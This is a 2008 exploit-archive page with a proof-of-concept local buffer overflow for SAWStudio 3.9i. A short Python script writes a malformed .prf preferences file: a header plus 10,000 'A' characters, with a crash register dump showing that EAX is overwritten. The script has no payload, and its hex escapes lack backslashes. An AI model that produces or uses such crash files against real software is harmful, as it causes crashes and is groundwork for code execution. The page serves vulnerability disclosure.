[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SAWStudio 3.9i (prf File) Local Buffer Overflow PoC
# Published : 2008-12-24
# Author : Encrypt3d.M!nd
# Previous Title : Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow PoC
# Next Title : Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit


# SAWStudio 3.9i (prf file) Buffer overflow Poc
# By:Encrypt3d.M!nd
#
# Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder,GGY,and all my friends
#####################################################################
#
# when you import Prefernces File "prf file" contain long characters
# an overflow will occure,and the registers will be just like this:
#
#
# EAX:41414141 ECX:00000000 EDX:00561498 EBX:00000000
# ESP:0012DA5C EBP:0012FAD0 ESI:00561498 EDI:00000000
# EIP:7C91B1FA ntdll.7C91B1FA
#
# Access violation when writing to[41414151]
#
# Tested on: Windows XP SP3
#####################################################################



l337 = ("x53x41x57x53x54x55x44x49x4Fx20x50x52x45x46x45x52x45x4Ex43x45x53x20x53x54x52x55x43x54x20x20x20x20x20")

pl = "A"*10000

file=open('enc.prf','w+')
file.write(l337+pl)
file.close()

# www.Syue.com [2008-12-24]